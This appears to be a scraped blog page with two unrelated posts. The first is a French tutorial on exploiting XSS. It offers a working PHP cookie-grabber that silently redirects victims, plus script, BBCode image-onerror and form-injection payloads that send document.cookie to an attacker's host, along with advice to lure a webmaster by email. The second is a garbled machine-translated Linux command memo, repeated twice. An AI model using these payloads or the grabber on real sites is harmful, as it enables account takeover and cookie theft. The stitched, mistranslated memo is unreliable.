La vulnérabilité XSS
--------------------------------------------------------------------
Sommaire :
1) Définition
2) Utulisation
3) Repèrage
4) Exploitation
5) Sécurisation
--------------------------------------------------------------------
----------------------------------------------
1) Définition
La faille XSS est une injection de code javascript dans des données lorsque le HTML n'est pas désactivé.
Par exemple, si la faille XSS est présente sur un forum de discussion ou un livre d'or nous pouvons alor poster en message du HTML.
Du coup, nous pouvons injecter du code javascript pour voler des cookies.
>Des cookies?? Tu parle,je commence a avoir faim oO
Du tout ! un cookie en informatique c'est un fichier qui contient des données sous forme d'un .txt enregistré par un site web et récupéré à la prochaine connexion.
Un petit exemple : vous allez pour la première fois sur un site web, vous vous logguez et cochez une case "connexion automatique", un cookie est forgé, car à chaque fois que vous reviendrez sur le site web, vous serez loggué automatiquement car le site web aura vu votre cookie !
Avec la faille XSS, nous pourrons voler le cookie de l'admin ensuite l'utuliser.
----------------------------------------------
----------------------------------------------
2) Utulisation
Pour exploiter la faille XSS, il nous faut un script PHP qui va enregistrer le cookie volé dans un .txt.
Voici un code PHP à mettre dans votre fichier xss.php ou autre :
Code : PHP
==================================================================================================================
<?php
$cookie = $_GET["c"]; // on reconnaît c en variable GET
if($cookie)
{
$fp = fopen("cookies.txt","a"); // On ouvre cookies.txt en edition (il est créé si il n'existe pas)
fputs($fp,$cook . "\r\n"); // On écrit le contenu du cookie sur une nouvelle ligne
fclose($fp); // On ferme le fichier cookies.txt
/* FAIRE UNE REDIRECTION JAVASCRIPT CI-DESSOUS POUR QU'ON SE DOUTE DE RIEN */
}
?>
<script>
location.replace("http://www.google.fr");
</script>
==================================================================================================================
Enregistrez le fichier sous et tapez wss.php et mettez le fichier sur un serveur FTP qui supporte le PHP
Ici nous imaginerons que notre site est http://monsite.fr, donc le fichier aura pour adresse http://monsite.fr/xss.php
passons à la partie suivante.
----------------------------------------------
Repèrage
Trouvez un moteur de recherche. Il vous demande de taper un mot-clé. Tapez en mot-clé <b>test</b>. Si vous voyez une phrase du genre "Résultats trouvés pour <b>test</b>", ou bien "Aucun résultat trouvé pour <b>test</b>", c'est qu'il va falloir aller ailleurs.
Par contre, si vous voyez un truc du style "Aucun résultat pour test", c'est que le HTML n'est pas paralysé, il y a une fameuse faille XSS ! :].
Maintenant, nous allons injecter du code Javascript.
Tapez en mot clé l'expression suivante :
<script>alert('Plop !');</script>
Si vous voyez au beau milieu de la page un joli panneau avec un incône exclamatif et un message "Plop !", c'est qu'il y a réellement une faille XSS :]
* Attention, ce n'est pas tout à fait terminé !
Il faut vérifier que des cookies sont bien enregistrés sur le site web en question ! Sinon à quoi ça servirait d'exploiter cette faille ? A rien.
Allez dans votre barre d'adresse puis tapez :
javascript:alert(document.cookie)
Si un panneau s'affiche avec aucun texte, vous pouvez lacher l'affaire, sinon, si vous voyez un texte du genre "login=; pass=;" etc... C'est que le site web forge des cookies d'identification ! Donc nous sommes bien parti pour une exploitation.
Mais d'abord nous allons essayer d'exploiter les failles XSS sur des forums (partie suivante)
----------------------------------------------
----------------------------------------------
4) Exploitation
Bon, dans cette partie, nous verrons plusieurs exploitations..
a) Forum
C'est la même chose qu'avec les moteur de recherche, une fois membre sur un forum vous avez votre cookie à vous.
Allez poster un message et tapez :
<b>salut !</b>
Si vous voyez salut, c'est que c'est bien parti. Sinon, Fuiyez ^^
Nous allons maintenant prendre un peu plus de risque, exécuter un script qui ouvre en pop-up notre voleur de cookie. insérer ceci après votre petit message discret :
<script>window.open("http://monsite.fr/xss.php?c="+document.cookie)</script>
On comprend parfaitement qu'il y a ?c=, c'est la variable $_GET['c'] de notre code. Ensuite on ferme le quot et on mets un + en javascript pour concaténer la variable superglobale document.cookie qui représente notre cookie, vous me suivez ?
Imaginez qu'une personne dont le pseudo est Dupont et dont le mot de passe est caramel, il aura un cookie qui peut ressembler à ça :
login=Dupont; pass= caramel;
Donc, quand il verra vote message, si il y a une faille XSS, une pop-up va s'ouvrir et va enregistrer vote cookie car c'est comme si le code était : <script>window.open("http://monsite.fr/r.php?c=login=Dupond; pass=caramel;")</script>
Et vu que notre script enregistre la valeur de $_GET['c'] dans cookies.txt, nous aurons stealé son cookie !!
> On peut parfaitement exploiter cette faille avec du BBCode, en particulier avec des images. Comment ? En utilisant les attributs onclick, onmousehover et onerror :]
Tout d'abord, nous allons étudier quelques exemples de codes HTML sur les images et leurs résultats :
Examples :
<img src="hacked.jpg" onclick="javascript:alert('coucou')"> : affiche un panneau d'alerte avec texte 'coucou' si le visiteur clique sur l'image hacked.jpg
<img src="hacked.jpg" onmousehover="javascript:alert('coucou')"> : affiche un panneau semblable à l'exemple précédent si cette fois le visiteur passe le curseur de sa souris sur l'image hacked.jpg
<img src="hacked.jpg" onerror="javascript:alert('coucou')"> : Affiche un panneau d'alerte semblable aux deux exemples précédents si l'image hacked.jpg n'existe pas.
> Et comment on peut faire avec le BBCode si tu peux rentrer qu'une adresse URL dans les [img] ?!
Voici la bonne synthaxe à insérer : Le code suivant entré en message sur le forum :
[img]http://" onerror="javascript:window.open('http://monsite.fr/r.php?c='+document.cookie)[/img]
Reviendra à exécuter le code HTML suivant :
<img src="http://" onerror="javascript:window.open('http://monsite.fr/r.php?c='+document.cookie)">
Et vu que l'image http:// n'existe pas, cela aura pour effet d'ouvrir en pop-up votre grabber de cookie avec en variable le cookie du visiteur !
----------------------------------------------
b) Moteur de recherche method GET
Dans cette sous partie nous en revenons au moteur de recherche. Pourquoi méthode GET ? Je vais vous l'expliquer.
Imaginons que vous êtes sur un site nommé http://www.victime.com/index.php. Des que vous tapez en mot clé 'hacked', l'url deviendra ainsi (par exemple) :
http://www.victime.com/index.php?word=hacked
Rien ne nous empêche, bien évidemment, de remplacer hacked par <b>test</b> et pour ensuite apercevoi sur la page un truc du genre : "Aucun résultat trouvé pour test", donc si test apparaît en gras c'est qu'il y a bien XSS :p
Assez parlé, entrez en mot-clé dans le moteur de recherche :
<script>location.replace="http://monsite.fr/xss.php?c="+document.cookie;</script>
Si vous êtes redirigé sur une page qui vole votre propre cookie et qui se ferme de suite, c'est qu'il y a XSS (xD)
Par contre, il va falloir prendre le temps de copier l'URL encodée avant de se faire rediriger. Répétez l'opération jusqu'à avoir réussi à copier l'adresse.
Maintenant, il faut trouver le mail du webmaster, faire un mail crédible et lui demander de se rendre sur votre URL piégée pour qu'il se fasse voler son cookie.
----------------------------------------------
c) Formulaire avec input limité
Si nous entrons dans email la valeur suivante :
c@c.c" onclick="javascript:alert('hacked')
Le code HTML deviendra ainsi : <a href=c@c.c" onclick="javascript:alert('hacked')">Mail</a>
Et des que le visiteur cliquera sur votre mail, un message d'alerte s'affichera avec le texte 'hacked'.
Faites cette action avec ce code :
c@c.c" onclick="javascript:window.open('http://site.com/xss.php?c='+document.cookie')
Et des que le visiteur voudra vous mailer, une pop-up s'ouvrira et volera le cookie de son visiteur si la faille XSS est présente.
----------------------------------------------
5) Sécuriser
Vous devez utiliser la fonction htmlentities avec deux arguments :
- Le premier sera votre variable
- le second est ENT_QUOTES, pour transformer les quots en " et donc interdire les ".
Exemple :
Code : PHP
$texte = htmlentities($_POST['texte'],ENT_QUOTES);
----------------------------------------------
==============================================
Zakizak was here ~ printf("Fuck Lamerz")
==============================================
mercredi 25 juillet 2018
Linux Commands Memo
To withdraw on the Root Server for example, know what you need woosh orders ..
Annexed to the orders that you are downloading ..
All you have to sit down and Tqriham time to arrange the orders are needed in a special file to you ..
Due to them when needed ..
Here View the orders which are in use by
pwd: display the full path to the current folder
ls: Show all files in the current folder
ls-al: Show all files and information
ls-alR: Show all files and subfolders in the information
ls-alR> filename.txt: such as ls-alR, but leave the result in the file
ls *. html: All files ending spill. html
cd [directory name]: change the current folder to another to be determined to write his name
cd .. : The current pace of change in volume one of the highest
clear: clean up the screen
vdir: give more information than it ls
exit: exit for the registration of Hel
Transfer, copying and scanning of files:
mv [old filename] [new filename]: the transfer or rename a file
cp [filename] [new filename]: to copy the file
rm [filename]: file of the survey
rm *: delete all the files in the current folder
rm *. html: a survey of all the files that the extension of expiring. html
rm-rf [directoryname]: survey of the entire volume
Create, move, copy and scan folders:
mkdir [directory name]: Create a new folder
ls-d * /: display all the folders within the current folder
cp-r [directory] [new directory]: copies of all files and folder within the new stripes
Search for files and folders:
find. -name [filename]-print: to search for the file
grep [********************************] [filename]: the search for text within the file
Permits files and folders:
There are three levels of permits files are: reading Read, Write and write implementation execute, there are also three sets to give such permits: Owner or Owner, Group and User Group for all everyone.
Chmod is used followed by Ptlatp numbers of permits, the first number is the owner of the Owner, and the second number of the Group and the third one is for all Everyone .. This interpretation of the numbers and levels of these permits:
0 = --- No permission
1 = - X Execute only
2 =-W-Write only
3 =-WX Write and execute
4 = R - Read only
5 = R-X Read and execute
6 = RW-Read and write
7 = RWX Read, write and execute
Always prefer to give a statement (0) to a Group in order to prevent the other users to browse the files from the server using the Telnet or FTP until
These are some of the most common permits:
chmod 604 [filename]: less of a statement to the Mphat Html
chmod 705 [directory name]: less a statement of volumes
chmod 755 [filename]: the least of the programs and permit Alascrepettat
chmod 606 [filename]: statement of the least used by Mphat Alascrepettat
chmod 703 [directory name]: read-only permission for the Public FTP
How to decompress the archive file using the Telnet:
First, to verify that you are inside the folder that contains your compressed file is written ls
If the file is not present your writing:
cd / big / dom / xdomain / www / directory /
Track your path to replace the file which contains your
Now the process is how to decompress the archive?
If the file extension ends. Zip File.zip for example, your writing is:
unzip file.zip
If the file extension ends with. Tar example file.tar your writing:
tar-xvf file.tar
If the file extension ends with. Gz file.gz like your writing:
gzip-d file.gz
If the file extension ends with. Tar.gz example file.tar.gz your writing:
gzip-d file.tar.gz
Therefore:
tar-xvf file.tar
How to backup the database:
mysqldump-u db_usr_name-pPASSWORD db_name> file name.SQL
How to retrieve database saved by:
mysql-u db_usr_name-pPASSWORD db_name <file name.SQL
How the pressure of the database:
tar-czvf file name.tar.gz file name.SQL
How to decompress the archive on the database:
tar-zxvf file name.tar.gz
How to do backup of all databases for a particular user:
mysqldump-uroot - all-databases | gzip> mysql_username.sql
Some other commands:
tail: like cat, but just read the end of file
tail / var / log / messages to see another 20 lines of / var / log / messages
tail-f / var / log / messages: continuing to watch for file changes during the
tail -200 / var / log / messages: print the last line of the file 200 on the screen
more: like cat
more / etc / userdomains: to browse through the file userdomains file.
pico: to use text editor
pico / home / burst / public_html / index.html: Liberation Index page for the user.
vi: another editor of the texts of many of the features, but most of the pico when used for the first time
vi / home / burst / public_html / index.html: also for the Liberation of the Index page for the user.
touch: the establishment of an empty file
touch / home/burst/public_html/404.html: to create a empty file called 404.html in the folder / home / burst / public_html /
ln: the establishment of links between files and folders
ln-s / usr / local / apache / conf / httpd.conf / etc / httpd.conf: Now you can edit / etc / httpd.conf rather than the original file. The changes will appear in the original file, as the survey link that you can change the file without the original.
rm: to delete the file
rm filename.txt: to remove a question of emphasis Confirmation deleted
rm-f filename.txt: delete the file, without question, to confirm the deletion.
rm-rf tmp /: the conversion of tmp folder and includes all the files and subfolders inside.
last: to display the log of the time
last -20: View the last 20 login process
last -20-a: presentation of the last 20 with the registration process to enter the field at the end of Hostmane
w: View current users on the server and logged on and where they are now at this moment.
netstat: View all related now.
netstat-an: offer all the related IP for the server as well as for each contact and the Port or outlet of communication.
top: to display the live system processes in the form of a nice memory, as well as information and Uptime and other useful information, which is very excellent in the management system and to ensure that everything is working well.
Screening by the use of memory to write your top and then Shift M
Screening by the use of your CPU top and then write Shift P
ps: It is short for process status which is similar to the top. It introduced the processes currently operating with the PID or Process ID, which is the definition of the Process or program, you can stop the program from this figure (as well check your orders to Kill
ps U username: display user specific programs
ps aux: Show All Processes or programs that
ps aux - forest: All the programs that work like the previous hierarchy, but very good and useful
du: to display the consumption or use of CD-Disk usage.
du-sh: to display a summary of space used by the current folder, including subfolders.
du-sh *: same thing but this is used for each file or folder basis, which is useful for finding files that reserved a large area
wc: the number of words
wc-l filename.txt: to find the file specified number of lines
cp: copies of the file
cp filename filename.backup: Copy the file to filename.backup
cp-a / home / burst / new_design / * / home / burst / public_html /: copies all files with the retention of permits to another folder
How to know the size of a file or folder:
du-h / home / username / public_html / test
kill: to stop a specific program
kill -9 PID EG: kill -9 431
kill PID EG: kill 10550
Use top or ps ux to determine the PIDs or Process I
Annexed to the orders that you are downloading ..
All you have to sit down and Tqriham time to arrange the orders are needed in a special file to you ..
Due to them when needed ..
Here View the orders which are in use by
pwd: display the full path to the current folder
ls: Show all files in the current folder
ls-al: Show all files and information
ls-alR: Show all files and subfolders in the information
ls-alR> filename.txt: such as ls-alR, but leave the result in the file
ls *. html: All files ending spill. html
cd [directory name]: change the current folder to another to be determined to write his name
cd .. : The current pace of change in volume one of the highest
clear: clean up the screen
vdir: give more information than it ls
exit: exit for the registration of Hel
Transfer, copying and scanning of files:
mv [old filename] [new filename]: the transfer or rename a file
cp [filename] [new filename]: to copy the file
rm [filename]: file of the survey
rm *: delete all the files in the current folder
rm *. html: a survey of all the files that the extension of expiring. html
rm-rf [directoryname]: survey of the entire volume
Create, move, copy and scan folders:
mkdir [directory name]: Create a new folder
ls-d * /: display all the folders within the current folder
cp-r [directory] [new directory]: copies of all files and folder within the new stripes
Search for files and folders:
find. -name [filename]-print: to search for the file
grep [********************************] [filename]: the search for text within the file
Permits files and folders:
There are three levels of permits files are: reading Read, Write and write implementation execute, there are also three sets to give such permits: Owner or Owner, Group and User Group for all everyone.
Chmod is used followed by Ptlatp numbers of permits, the first number is the owner of the Owner, and the second number of the Group and the third one is for all Everyone .. This interpretation of the numbers and levels of these permits:
0 = --- No permission
1 = - X Execute only
2 =-W-Write only
3 =-WX Write and execute
4 = R - Read only
5 = R-X Read and execute
6 = RW-Read and write
7 = RWX Read, write and execute
Always prefer to give a statement (0) to a Group in order to prevent the other users to browse the files from the server using the Telnet or FTP until
These are some of the most common permits:
chmod 604 [filename]: less of a statement to the Mphat Html
chmod 705 [directory name]: less a statement of volumes
chmod 755 [filename]: the least of the programs and permit Alascrepettat
chmod 606 [filename]: statement of the least used by Mphat Alascrepettat
chmod 703 [directory name]: read-only permission for the Public FTP
How to decompress the archive file using the Telnet:
First, to verify that you are inside the folder that contains your compressed file is written ls
If the file is not present your writing:
cd / big / dom / xdomain / www / directory /
Track your path to replace the file which contains your
Now the process is how to decompress the archive?
If the file extension ends. Zip File.zip for example, your writing is:
unzip file.zip
If the file extension ends with. Tar example file.tar your writing:
tar-xvf file.tar
If the file extension ends with. Gz file.gz like your writing:
gzip-d file.gz
If the file extension ends with. Tar.gz example file.tar.gz your writing:
gzip-d file.tar.gz
Therefore:
tar-xvf file.tar
How to backup the database:
mysqldump-u db_usr_name-pPASSWORD db_name> file name.SQL
How to retrieve database saved by:
mysql-u db_usr_name-pPASSWORD db_name <file name.SQL
How the pressure of the database:
tar-czvf file name.tar.gz file name.SQL
How to decompress the archive on the database:
tar-zxvf file name.tar.gz
How to do backup of all databases for a particular user:
mysqldump-uroot - all-databases | gzip> mysql_username.sql
Some other commands:
tail: like cat, but just read the end of file
tail / var / log / messages to see another 20 lines of / var / log / messages
tail-f / var / log / messages: continuing to watch for file changes during the
tail -200 / var / log / messages: print the last line of the file 200 on the screen
more: like cat
more / etc / userdomains: to browse through the file userdomains file.
pico: to use text editor
pico / home / burst / public_html / index.html: Liberation Index page for the user.
vi: another editor of the texts of many of the features, but most of the pico when used for the first time
vi / home / burst / public_html / index.html: also for the Liberation of the Index page for the user.
touch: the establishment of an empty file
touch / home/burst/public_html/404.html: to create a empty file called 404.html in the folder / home / burst / public_html /
ln: the establishment of links between files and folders
ln-s / usr / local / apache / conf / httpd.conf / etc / httpd.conf: Now you can edit / etc / httpd.conf rather than the original file. The changes will appear in the original file, as the survey link that you can change the file without the original.
rm: to delete the file
rm filename.txt: to remove a question of emphasis Confirmation deleted
rm-f filename.txt: delete the file, without question, to confirm the deletion.
rm-rf tmp /: the conversion of tmp folder and includes all the files and subfolders inside.
last: to display the log of the time
last -20: View the last 20 login process
last -20-a: presentation of the last 20 with the registration process to enter the field at the end of Hostmane
w: View current users on the server and logged on and where they are now at this moment.
netstat: View all related now.
netstat-an: offer all the related IP for the server as well as for each contact and the Port or outlet of communication.
top: to display the live system processes in the form of a nice memory, as well as information and Uptime and other useful information, which is very excellent in the management system and to ensure that everything is working well.
Screening by the use of memory to write your top and then Shift M
Screening by the use of your CPU top and then write Shift P
ps: It is short for process status which is similar to the top. It introduced the processes currently operating with the PID or Process ID, which is the definition of the Process or program, you can stop the program from this figure (as well check your orders to Kill
ps U username: display user specific programs
ps aux: Show All Processes or programs that
ps aux - forest: All the programs that work like the previous hierarchy, but very good and useful
du: to display the consumption or use of CD-Disk usage.
du-sh: to display a summary of space used by the current folder, including subfolders.
du-sh *: same thing but this is used for each file or folder basis, which is useful for finding files that reserved a large area
wc: the number of words
wc-l filename.txt: to find the file specified number of lines
cp: copies of the file
cp filename filename.backup: Copy the file to filename.backup
cp-a / home / burst / new_design / * / home / burst / public_html /: copies all files with the retention of permits to another folder
How to know the size of a file or folder:
du-h / home / username / public_html / test
kill: to stop a specific program
kill -9 PID EG: kill -9 431
kill PID EG: kill 10550
Use top or ps ux to determine the PIDs or Process I
Inscription à :
Articles (Atom)